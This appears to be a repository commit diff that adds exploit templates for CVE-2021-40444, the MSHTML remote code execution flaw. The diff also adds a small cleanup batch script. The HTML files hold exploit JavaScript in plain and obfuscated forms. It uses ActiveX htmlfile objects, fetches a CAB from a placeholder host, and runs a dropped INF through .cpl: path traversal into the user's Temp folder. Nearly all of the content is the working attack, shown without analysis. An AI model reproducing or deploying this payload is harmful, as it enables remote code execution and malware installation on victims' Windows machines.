Compare commits
2 Commits
31415dbf4e
...
7d0e32466e
Author | SHA1 | Date |
---|---|---|
d3adc0de | 7d0e32466e | 3 years ago |
d3adc0de | a0d1b8d4c4 | 3 years ago |
@ -1,9 +1,8 @@ |
||||
venv |
||||
out |
||||
test |
||||
srv |
||||
.idea |
||||
__pycache__ |
||||
template/sample4-nw.html |
||||
!srv/index.html |
||||
setup* |
||||
*.7z |
||||
|
Binary file not shown.
Binary file not shown.
Binary file not shown.
@ -0,0 +1,8 @@ |
||||
@echo off |
||||
|
||||
del /F /Q "setup.inf" |
||||
del /F /Q "setup.rpt" |
||||
del /F /Q "out\*" |
||||
del /F /Q "data\*.dll" |
||||
del /F /Q "srv\*" |
||||
xcopy /Y /Q "template\index.html" "srv\" |
@ -0,0 +1,79 @@ |
||||
<!DOCTYPE html> |
||||
<html lang="en"> |
||||
<head> |
||||
<meta charset="UTF-8"> |
||||
<meta http-equiv="Expires" content="-1"> |
||||
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||
<title>CVE-2021-40444</title> |
||||
</head> |
||||
<body> |
||||
<script> |
||||
|
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
|
||||
|
||||
function dropIframe() { |
||||
var i = document.createElement("iframe"); |
||||
i.src = ".cpl:../../../AppData/Local/Temp/<INF_CHANGE_HERE>"; |
||||
document.documentElement.appendChild(i); |
||||
} |
||||
|
||||
function downloadCAB(){ |
||||
var obj = document.createElement("object"); |
||||
obj.setAttribute("codebase", '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||
obj.setAttribute("classid", 'CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'); |
||||
} |
||||
|
||||
downloadCAB(); |
||||
setTimeout(function(){ dropIframe(); }, 3000); |
||||
|
||||
</script> |
||||
|
||||
</body> |
||||
</html> |
@ -0,0 +1,69 @@ |
||||
<!DOCTYPE html> |
||||
<html> |
||||
<head> |
||||
<meta http-equiv="Expires" content="-1"> |
||||
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||
</head> |
||||
<body> |
||||
<script> |
||||
function garbage() { |
||||
return 'garbage'; |
||||
} |
||||
(function exploit() { |
||||
var iframe = window["Document"]['prototype']['createElement']['call'](window["document"], 'iframe'); |
||||
try { |
||||
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['body'], iframe); |
||||
} catch (_0x1ab454) { |
||||
window["HTMLElement"]["prototype"]["appendChild"]['call'](window["document"]['documentElement'], iframe); |
||||
} |
||||
var htmlfile = iframe['contentWindow']['ActiveXObject'], htmlfile2 = new htmlfile('htmlfile'); |
||||
iframe['contentDocument']['open']()['close'](); |
||||
try { |
||||
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['body'], iframe); |
||||
} catch (_0x3b004e) { |
||||
window["HTMLElement"]["prototype"]["removeChild"]['call'](window["document"]['documentElement'], iframe); |
||||
} |
||||
htmlfile2['open']()['close'](); |
||||
var htmlfile3 = new htmlfile2[('Script')]['ActiveXObject']('htmlfile'); |
||||
htmlfile3['open']()['close'](); |
||||
var htmlfile4 = new htmlfile3[('Script')]['ActiveXObject']('htmlfile'); |
||||
htmlfile4['open']()['close'](); |
||||
var htmlfile5 = new htmlfile4[('Script')]['ActiveXObject']('htmlfile'); |
||||
htmlfile5['open']()['close'](); |
||||
var ActiveXObjectVAR = new ActiveXObject('htmlfile') |
||||
, ActiveXObjectVAR2 = new ActiveXObject('htmlfile') |
||||
, ActiveXObjectVAR3 = new ActiveXObject('htmlfile') |
||||
, ActiveXObjectVAR4 = new ActiveXObject('htmlfile') |
||||
, ActiveXObjectVAR5 = new ActiveXObject('htmlfile') |
||||
, ActiveXObjectVAR6 = new ActiveXObject('htmlfile') |
||||
, XMLHttpR = new window['XMLHttpRequest']() |
||||
, XMLHttpRopen = window['XMLHttpRequest']['prototype']['open'] |
||||
, XMLHttpRsend = window['XMLHttpRequest']['prototype']['send']; |
||||
XMLHttpRopen['call'](XMLHttpR, 'GET', '<HOST_CHANGE_HERE>', ![]), |
||||
XMLHttpRsend['call'](XMLHttpR), |
||||
htmlfile5['Script']['document']['write']('body>'); |
||||
var htmlScript = window["Document"]['prototype']['createElement']['call'](htmlfile5['Script']['document'], 'object'); |
||||
htmlScript['setAttribute']('codebase', '<HOST_CHANGE_HERE>#version=5,0,0,0'); |
||||
htmlScript['setAttribute']('CLSID:edbc374c-5730-432a-b5b8-de94f0b57217'), |
||||
window["HTMLElement"]["prototype"]["appendChild"]['call'](htmlfile5['Script']['document']['body'], htmlScript), |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:123?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR2['Script']['location'] = '<URI_SCHEME_HERE>:../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR3['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR5['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>', |
||||
ActiveXObjectVAR4['Script']['location'] = '<URI_SCHEME_HERE>:../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>'; |
||||
}()); |
||||
</script> |
||||
</body> |
||||
</html> |
@ -0,0 +1,146 @@ |
||||
<!DOCTYPE html> |
||||
<html lang="en"> |
||||
<head> |
||||
<meta charset="UTF-8"> |
||||
<meta http-equiv="Expires" content="-1"> |
||||
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||
<title>CVE-2021-40444</title> |
||||
</head> |
||||
<body> |
||||
<script> |
||||
'use strict'; |
||||
/** @type {!Array} */ |
||||
var tokensArray = ["123", "365952KMsRQT", "tiveX", "/Lo", "./../../", "contentDocument", "ppD", "Dat", "close", "Acti", "removeChild", "mlF", "write", "./A", "ata/", "ile", "../", "body", "setAttribute", "#version=5,0,0,0", "ssi", "iframe", "748708rfmUTk", "documentElement", "lFile", "location", "159708hBVRtu", "a/Lo", "Script", "document", "call", "contentWindow", "emp", "Document", "Obj", "prototype", "lfi", "bject", "send", "appendChild", "Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "htmlfile", "115924pLbIpw", "GET", |
||||
"p/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "1109sMoXXX", "./../A", "htm", "l/T", "cal/", "1wzQpCO", "ect", "w/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "522415dmiRUA", "<HOST_CHANGE_HERE>", "88320wWglcB", "XMLHttpRequest", "<INF_CHANGE_HERE>?<URI_SCHEME_HERE>", "Act", "D:edbc374c-5730-432a-b5b8-de94f0b57217", "open", "<bo", "HTMLElement", "/..", "veXO", "102FePAWC"]; |
||||
/** |
||||
* @param {number} totalExpectedResults |
||||
* @param {?} entrySelector |
||||
* @return {?} |
||||
*/ |
||||
function getValue(totalExpectedResults, entrySelector) { |
||||
return getValue = function(state, value) { |
||||
/** @type {number} */ |
||||
state = state - 170; |
||||
var processorState = tokensArray[state]; |
||||
return processorState; |
||||
}, getValue(totalExpectedResults, entrySelector); |
||||
} |
||||
(function(data, oldPassword) { |
||||
/** @type {function(number, ?): ?} */ |
||||
var toMonths = getValue; |
||||
for (; !![];) { |
||||
try { |
||||
/** @type {number} */ |
||||
var userPsd = parseInt(toMonths(206)) + parseInt(toMonths(216)) * parseInt(toMonths(196)) + parseInt(toMonths(201)) * -parseInt(toMonths(173)) + parseInt(toMonths(177)) + parseInt(toMonths(204)) + -parseInt(toMonths(193)) + parseInt(toMonths(218)); |
||||
if (userPsd === oldPassword) { |
||||
break; |
||||
} else { |
||||
data["push"](data["shift"]()); |
||||
} |
||||
} catch (_0x34af1e) { |
||||
data["push"](data["shift"]()); |
||||
} |
||||
} |
||||
})(tokensArray, 384881), function() { |
||||
/** |
||||
* @return {?} |
||||
*/ |
||||
function token_dash_lineno() { |
||||
/** @type {function(number, ?): ?} */ |
||||
var addedRelations = currentRelations; |
||||
return addedRelations(205); |
||||
} |
||||
/** @type {function(number, ?): ?} */ |
||||
var currentRelations = getValue; |
||||
/** @type {!Window} */ |
||||
var global = window; |
||||
var document = global["document"]; |
||||
var then = global["Document"]["prototype"]["createElement"]; |
||||
var writeFunction = global["Document"]["prototype"]["write"]; |
||||
var PL$22 = global["HTMLElement"]["prototype"]["appendChild"]; |
||||
var $ = global["HTMLElement"]["prototype"]["removeChild"]; |
||||
var el = then["call"](document, "iframe"); |
||||
try { |
||||
PL$22["call"](document["body"], el); |
||||
} catch (_0x1ab454) { |
||||
PL$22["call"](document["documentElement"], el); |
||||
} |
||||
var ACTIVEX = el["contentWindow"]["ActiveXObject"]; |
||||
var model = new ACTIVEX("htmlfile"); |
||||
el["contentDocument"]["open"]()["close"](); |
||||
/** @type {string} */ |
||||
var colname = "p"; |
||||
try { |
||||
$["call"](document["body"], el); |
||||
} catch (_0x3b004e) { |
||||
$["call"](document["documentElement"], el); |
||||
} |
||||
model["open"]()["close"](); |
||||
var ops = new model["Script"]["Act" + "iveX" + "Obj" + "ect"]("htmlFile"); |
||||
ops["open"]()["close"](); |
||||
/** @type {string} */ |
||||
var _ = "c"; |
||||
var TokenType = new ops["Script"]["Ac" + "tiveX" + "Object"]("htmlFile"); |
||||
TokenType["open"]()["close"](); |
||||
var view = new TokenType["Script"]["Acti" + "veXO" + "bject"]("htmlFile"); |
||||
view["open"]()["close"](); |
||||
var iedom = new ActiveXObject("htmlfile"); |
||||
var rp_test = new ActiveXObject("htmlfile"); |
||||
var htmlfile = new ActiveXObject("htmlfile"); |
||||
var fake = new ActiveXObject("htmlfile"); |
||||
var doc = new ActiveXObject("htmlfile"); |
||||
var a = new ActiveXObject("htmlfile"); |
||||
var Object = global["XMLHttpRequest"]; |
||||
var args = new Object; |
||||
var ast = Object["prototype"]["open"]; |
||||
var callbacks = Object["prototype"]["send"]; |
||||
var modelIns = global["setTimeout"]; |
||||
ast["call"](args, "GET", token_dash_lineno(), ![]); |
||||
callbacks["call"](args); |
||||
view["Script"]["document"]["write"]("<body>"); |
||||
var s = then["call"](view["Script"]["document"], "object"); |
||||
s["setAttribute"]("codebase", token_dash_lineno() + "#version=5,0,0,0"); |
||||
/** @type {string} */ |
||||
var i = "l"; |
||||
s["setAttribute"]("classid", "CLSID:edbc374c-5730-432a-b5b8-de94f0b57217"); |
||||
PL$22["call"](view["Script"]["document"]["body"], s); |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":123?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
iedom["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
rp_test["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
htmlfile["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../AppData/Local/Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
doc["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../../../../Temp/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../Low/<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
/** @type {string} */ |
||||
fake["Script"]["location"] = "<URI_SCHEME_HERE>" + ":../../<INF_CHANGE_HERE>?<URI_SCHEME_HERE>"; |
||||
}(); |
||||
|
||||
</script> |
||||
|
||||
</body> |
||||
</html> |
File diff suppressed because one or more lines are too long
@ -0,0 +1,75 @@ |
||||
<!DOCTYPE html> |
||||
<html lang="en"> |
||||
<head> |
||||
<meta charset="UTF-8"> |
||||
<meta http-equiv="Expires" content="-1"> |
||||
<meta http-equiv="X-UA-Compatible" content="IE=11"> |
||||
<title>CVE-2021-40444</title> |
||||
</head> |
||||
<body> |
||||
<script> |
||||
|
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
// AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA |
||||
